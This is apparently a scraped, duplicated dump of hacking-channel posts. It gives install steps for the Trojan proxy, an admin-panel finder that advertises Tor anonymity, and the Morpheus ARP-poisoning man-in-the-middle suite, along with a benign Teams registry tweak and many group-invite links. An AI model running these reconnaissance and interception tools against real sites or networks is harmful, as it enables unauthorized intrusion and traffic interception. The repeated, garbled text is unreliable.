> https://github.com/trojan-gfw/trojan/tarball/master
๐ฆTO run Require:
1) CMake >= 3.7.2
2) Boost >= 1.66.0
3) OpenSSL >= 1.0.2
4) libmysqlclient
๐ฆRun via
TROJAN_DEBIAN_VERSION="1.10.0-3"
1) sudo apt update
2) sudo apt install build-essential devscripts debhelper cmake libboost-system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev python3 curl openssl
3) dget http://ftp.us.debian.org/debian/pool/main/t/trojan/trojan_${TROJAN_DEBIAN_VERSION}.dsc
4) dpkg-source -x trojan_${TROJAN_DEBIAN_VERSION}.dsc trojan-${TROJAN_DEBIAN_VERSION}
5) cd trojan-${TROJAN_DEBIAN_VERSION}/
dpkg-buildpackage -us -uc -d
6) sudo dpkg -i ../trojan_${TROJAN_DEBIAN_VERSION}_$(dpkg-architecture -q DEB_BUILD_ARCH).deb
7) sudo apt purge devscripts debhelper cmake # you can remove it now
๐ฆUbanto:
18.10 & 19.04
1) sudo add-apt-repository ppa:greaterfire/trojan
2) sudo apt-get update
3) sudo apt-get install trojan
>= 19.04
> sudo apt-get install trojan
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat is Administrator application Or Admin Panel In Apps & Sites ?
Twitter.com/UndercOdeTC
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> The Administrator application, also known as the Back-end, Admin Panel or Control Panel, is the interface where administrators and other site officials with appropriate privileges can manipulate .
> There are many tasks which can be done with the administrator interface. You can set up how your web site looks with the Template Manager or completely change a web site's look by changing the template to another template.
> You can also add new extensions such as components, languages, modules, and plugins.
๐ฆLogging In and Out of the Administrator (Application),
administrator (commonly called Back-End) :
1) You can only log in to the Administrator interface if you have administration or back-end privileges.
๐ฆHow to Log In
2) The Administrator interface (application) can be reached by appending the word administrator to the URL of your site. For example, if you usally access your web site on:
> http://www.example.com/
3) then go to http://www.example.com/administrator to access the Administrator panel
4) Enter your username and password into the relevant fields.
> If required, select your preferred language from the drop-down list.
5) Now click the Login button and if you are logged in successfully you should see the Administrator control panel screen
Written By ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat is Administrator application Or Admin Panel In Apps & Sites ?
Twitter.com/UndercOdeTC
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
> The Administrator application, also known as the Back-end, Admin Panel or Control Panel, is the interface where administrators and other site officials with appropriate privileges can manipulate .
> There are many tasks which can be done with the administrator interface. You can set up how your web site looks with the Template Manager or completely change a web site's look by changing the template to another template.
> You can also add new extensions such as components, languages, modules, and plugins.
๐ฆLogging In and Out of the Administrator (Application),
administrator (commonly called Back-End) :
1) You can only log in to the Administrator interface if you have administration or back-end privileges.
๐ฆHow to Log In
2) The Administrator interface (application) can be reached by appending the word administrator to the URL of your site. For example, if you usally access your web site on:
> http://www.example.com/
3) then go to http://www.example.com/administrator to access the Administrator panel
4) Enter your username and password into the relevant fields.
> If required, select your preferred language from the drop-down list.
5) Now click the Login button and if you are logged in successfully you should see the Administrator control panel screen
Written By ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest Admin Panel finder official tool :
> adminFinder: Easy way to find admin panel of site
> dminFinder is an Apache2 Licensed utility, rewritten in Python 3.x, for admins/pentesters who want to find admin panel of a website.
> There are many other tools but not as effective and secure. Yeah, adminfinder has the the ability to use tor and hide your identity
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> Linux
1) sudo apt install tor
2) sudo apt install python3-socks (optional)
3) git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
4) cd okadminfinder3
5) chmod +x okadminfinder.py
6) python3 okadminfinder.py
๐ฆWindows:
1) download & extract zip
> https://github.com/mIcHyAmRaNe/okadminfinder3/archive/master.zip
2) cd okadminfinder3
3) py -3 okadminfinder.py
๐ฆFeatures:
1) More than 500 potential admin panels
2) Tor & Proxy
3) Random-Proxy
4) Random-Agents
5) Console work with params, like: okadminfinder.py -u example.com --proxy 127.0.0.1:8080
6) Self-Update
7) Classify admin panel links by popularity
8) Multithreading, for faster work
9) Adding more potential admin panel pages
๐ฆVideo Tutorial
https://youtu.be/iJg4NJT5qkY/
๐ฆTested By UndercOde on:
> debian 10x
Written By ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest Admin Panel finder official tool :
> adminFinder: Easy way to find admin panel of site
> dminFinder is an Apache2 Licensed utility, rewritten in Python 3.x, for admins/pentesters who want to find admin panel of a website.
> There are many other tools but not as effective and secure. Yeah, adminfinder has the the ability to use tor and hide your identity
instagram.com/UnderCodeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
> Linux
1) sudo apt install tor
2) sudo apt install python3-socks (optional)
3) git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
4) cd okadminfinder3
5) chmod +x okadminfinder.py
6) python3 okadminfinder.py
๐ฆWindows:
1) download & extract zip
> https://github.com/mIcHyAmRaNe/okadminfinder3/archive/master.zip
2) cd okadminfinder3
3) py -3 okadminfinder.py
๐ฆFeatures:
1) More than 500 potential admin panels
2) Tor & Proxy
3) Random-Proxy
4) Random-Agents
5) Console work with params, like: okadminfinder.py -u example.com --proxy 127.0.0.1:8080
6) Self-Update
7) Classify admin panel links by popularity
8) Multithreading, for faster work
9) Adding more potential admin panel pages
๐ฆVideo Tutorial
https://youtu.be/iJg4NJT5qkY/
๐ฆTested By UndercOde on:
> debian 10x
Written By ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMicrosoft Teams Outlook AddIn Hacks eXAmple :
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
The Microsoft Teams application always COM-registers the Team-Addin for Outlook. However, if not enabled for your Outlook/Office365 subscription it deletes a few registry keys on startup, namely HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\TeamsAddin.Connect - so Outlook simply won't load it on startup.
> So here is how to hack the Teams Meeting Button into Outlook, cf. start_outlook_teams.bat:
1) Start Teams (deletes registry keys!)
2) Add registry keys from enable_teams.reg
3) Start Outlook
4) Unfortunately, you will have repeat this everytime you restart Teams.
๐ฆ enable_teams.reg:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Resiliency\DoNotDisableAddinList]
"TeamsAddin.Connect"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Resiliency\DoNotDisableAddinList]
"TeamsAddin.Connect"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\TeamsAddin.Connect]
"Description"="Microsoft Teams Meeting Add-in for Microsoft Office"
"FriendlyName"="Microsoft Teams Meeting Add-in for Microsoft Office"
"LoadBehavior"=dword:00000003
๐ฆ start_outlook_teams.bat:
@echo off
setlocal
echo Starting Teams. Press any key when ready.
start "Teams" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Teams.lnk"
pause > NUL
echo.
echo Enable Outlook Teams-AddIn (regedit)...
regedit /S "%~dp0enable_teams.reg"
echo.
echo Starting Outlook...
start "Outlook" "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Outlook.lnk"
echo You should see the 'New Teams Meeting' button in Outlook calendar view.
pause
endlocal
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMicrosoft Teams Outlook AddIn Hacks eXAmple :
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
The Microsoft Teams application always COM-registers the Team-Addin for Outlook. However, if not enabled for your Outlook/Office365 subscription it deletes a few registry keys on startup, namely HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\TeamsAddin.Connect - so Outlook simply won't load it on startup.
> So here is how to hack the Teams Meeting Button into Outlook, cf. start_outlook_teams.bat:
1) Start Teams (deletes registry keys!)
2) Add registry keys from enable_teams.reg
3) Start Outlook
4) Unfortunately, you will have repeat this everytime you restart Teams.
๐ฆ enable_teams.reg:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Resiliency\DoNotDisableAddinList]
"TeamsAddin.Connect"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Resiliency\DoNotDisableAddinList]
"TeamsAddin.Connect"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\Addins\TeamsAddin.Connect]
"Description"="Microsoft Teams Meeting Add-in for Microsoft Office"
"FriendlyName"="Microsoft Teams Meeting Add-in for Microsoft Office"
"LoadBehavior"=dword:00000003
๐ฆ start_outlook_teams.bat:
@echo off
setlocal
echo Starting Teams. Press any key when ready.
start "Teams" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Teams.lnk"
pause > NUL
echo.
echo Enable Outlook Teams-AddIn (regedit)...
regedit /S "%~dp0enable_teams.reg"
echo.
echo Starting Outlook...
start "Outlook" "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Outlook.lnk"
echo You should see the 'New Teams Meeting' button in Outlook calendar view.
pause
endlocal
@ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆJOIN US FOR LEARN HACKING๐ฆ
EveryDay new Tutorials :
<Those Only Our ENGLISH HACK GROUPES>
๐ฆRESPECT RULES :
> NO ADDS
> NO OTHER GROUPES LINKS
๐ฆ if groupe full try another link :
>https://chat.whatsapp.com/GWFHLdu7lpE14cw1soVHsg
> https://chat.whatsapp.com/FFYmyrnFdmo5R5EvwM7z9b
> https://chat.whatsapp.com/CMpnD53pY0xH6UK77oBNGt
> https://chat.whatsapp.com/DtiBC1Dp8cXHgTL0poEygc
> https://chat.whatsapp.com/LwWtKgQ59PeLM80qTZxmzE
> (This groupe for only Tested Youtube)
https://chat.whatsapp.com/Jn6ITcdWzF0EDja2YYLBvb
> https://chat.whatsapp.com/HrFYL94B7Kx3uTUSWa7kKe
> https://chat.whatsapp.com/Cd8CcBnWSEBJBUGg9AtbXg
> https://chat.whatsapp.com/DCF1oQiKFZED0kepp5ytyT
> https://chat.whatsapp.com/GWFHLdu7lpE14cw1soVHsg
> https://chat.whatsapp.com/GzkP126UuCxGEiUf8NqZvQ
> https://chat.whatsapp.com/Bc54qusd5wq8giVb6KevnB
(official Under cOde Groupe)
> https://chat.whatsapp.com/DtiBC1Dp8cXHgTL0poEygc
> https://chat.whatsapp.com/FjXZAAeYsus0J0h86XrRdk
> https://chat.whatsapp.com/GtiYBUOtfu95VeeE4RG6No
> https://chat.whatsapp.com/G78hIYxBNVa1kqRDRpJNpO
(Fav)
> https://chat.whatsapp.com/Lo3uVSUYEjMGY3sLzWvxy2
> (IOS Developpers /This Only Ios)
https://chat.whatsapp.com/F2OCn7jbgjAACKouOnILHm
MAIL US To Get More Links:
UndercodeTesting@Hotmail.com
๐ฆTELEGRAM:
> T.me/UndercOdeTestingOfficial
(OFFICIAL HACK CHANNEL)
> t.me/iOsDeveloppers
(only Ios)
๐ฆMail :
UndercOdeTesting@Hotmail.com
๐ฆInstagram.com/UndercOdeTestingCompany
> Facebook.com/UndercOdeTestingCompanie
> Twitter.con/UnderCodeTC
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆJOIN US FOR LEARN HACKING๐ฆ
EveryDay new Tutorials :
<Those Only Our ENGLISH HACK GROUPES>
๐ฆRESPECT RULES :
> NO ADDS
> NO OTHER GROUPES LINKS
๐ฆ if groupe full try another link :
>https://chat.whatsapp.com/GWFHLdu7lpE14cw1soVHsg
> https://chat.whatsapp.com/FFYmyrnFdmo5R5EvwM7z9b
> https://chat.whatsapp.com/CMpnD53pY0xH6UK77oBNGt
> https://chat.whatsapp.com/DtiBC1Dp8cXHgTL0poEygc
> https://chat.whatsapp.com/LwWtKgQ59PeLM80qTZxmzE
> (This groupe for only Tested Youtube)
https://chat.whatsapp.com/Jn6ITcdWzF0EDja2YYLBvb
> https://chat.whatsapp.com/HrFYL94B7Kx3uTUSWa7kKe
> https://chat.whatsapp.com/Cd8CcBnWSEBJBUGg9AtbXg
> https://chat.whatsapp.com/DCF1oQiKFZED0kepp5ytyT
> https://chat.whatsapp.com/GWFHLdu7lpE14cw1soVHsg
> https://chat.whatsapp.com/GzkP126UuCxGEiUf8NqZvQ
> https://chat.whatsapp.com/Bc54qusd5wq8giVb6KevnB
(official Under cOde Groupe)
> https://chat.whatsapp.com/DtiBC1Dp8cXHgTL0poEygc
> https://chat.whatsapp.com/FjXZAAeYsus0J0h86XrRdk
> https://chat.whatsapp.com/GtiYBUOtfu95VeeE4RG6No
> https://chat.whatsapp.com/G78hIYxBNVa1kqRDRpJNpO
(Fav)
> https://chat.whatsapp.com/Lo3uVSUYEjMGY3sLzWvxy2
> (IOS Developpers /This Only Ios)
https://chat.whatsapp.com/F2OCn7jbgjAACKouOnILHm
MAIL US To Get More Links:
UndercodeTesting@Hotmail.com
๐ฆTELEGRAM:
> T.me/UndercOdeTestingOfficial
(OFFICIAL HACK CHANNEL)
> t.me/iOsDeveloppers
(only Ios)
๐ฆMail :
UndercOdeTesting@Hotmail.com
๐ฆInstagram.com/UndercOdeTestingCompany
> Facebook.com/UndercOdeTestingCompanie
> Twitter.con/UnderCodeTC
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
WhatsApp.com
WhatsApp Group Invite
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆautomated ettercap TCP/IP Hijacking tool
Twitter.com/UndercOdeTC
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1ยบ - git clone https://github.com/r00t-3xp10it/morpheus.git
2ยบ - cd morpheus
3ยบ - chmod -R +x *.sh
4ยบ - chmod -R +x *.py
5ยบ - nano settings
6ยบ - sudo ./morpheus.sh
๐ฆWhat This tool Do?
> Morpheus it's a Man-In-The-Middle (mitm) suite that allows users to manipulate
> tcp/udp data using ettercap, urlsnarf, msgsnarf and tcpkill as backend applications.
but this tool main objective its not to provide an easy way to exploit/sniff targets,
but ratter a call of attemption to tcp/udp manipulations technics (etter filters)
> Morpheus ships with some pre-configurated filters but it will allow users to improve them
when launch the attack (morpheus scripting console). In the end of the attack morpheus will
revert the filter back to is default stage, this will allow users to improve filters at
running time without the fear of messing with filter command syntax and spoil the filter.
"Perfect for scripting fans to safely test new concepts"...
> HINT: morpheus allow you to improve filters in 2 diferent ways
1ยบ - Edit filter before runing morpheus and the 'changes' will be permanent
2ยบ - Edit filter using 'morpheus scripting console' and the changes are active only once
๐ฆFramework limitations
1ยบ - morpheus will fail if target system its protected againt arp poison atacks
2ยบ - target system sometimes needs to clear the net cache for arp poison to be effective
3ยบ - many attacks described in morpheus may be dropped by the target HSTS detection sys.
@ Steave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆautomated ettercap TCP/IP Hijacking tool
Twitter.com/UndercOdeTC
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1ยบ - git clone https://github.com/r00t-3xp10it/morpheus.git
2ยบ - cd morpheus
3ยบ - chmod -R +x *.sh
4ยบ - chmod -R +x *.py
5ยบ - nano settings
6ยบ - sudo ./morpheus.sh
๐ฆWhat This tool Do?
> Morpheus it's a Man-In-The-Middle (mitm) suite that allows users to manipulate
> tcp/udp data using ettercap, urlsnarf, msgsnarf and tcpkill as backend applications.
but this tool main objective its not to provide an easy way to exploit/sniff targets,
but ratter a call of attemption to tcp/udp manipulations technics (etter filters)
> Morpheus ships with some pre-configurated filters but it will allow users to improve them
when launch the attack (morpheus scripting console). In the end of the attack morpheus will
revert the filter back to is default stage, this will allow users to improve filters at
running time without the fear of messing with filter command syntax and spoil the filter.
"Perfect for scripting fans to safely test new concepts"...
> HINT: morpheus allow you to improve filters in 2 diferent ways
1ยบ - Edit filter before runing morpheus and the 'changes' will be permanent
2ยบ - Edit filter using 'morpheus scripting console' and the changes are active only once
๐ฆFramework limitations
1ยบ - morpheus will fail if target system its protected againt arp poison atacks
2ยบ - target system sometimes needs to clear the net cache for arp poison to be effective
3ยบ - many attacks described in morpheus may be dropped by the target HSTS detection sys.
@ Steave(tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ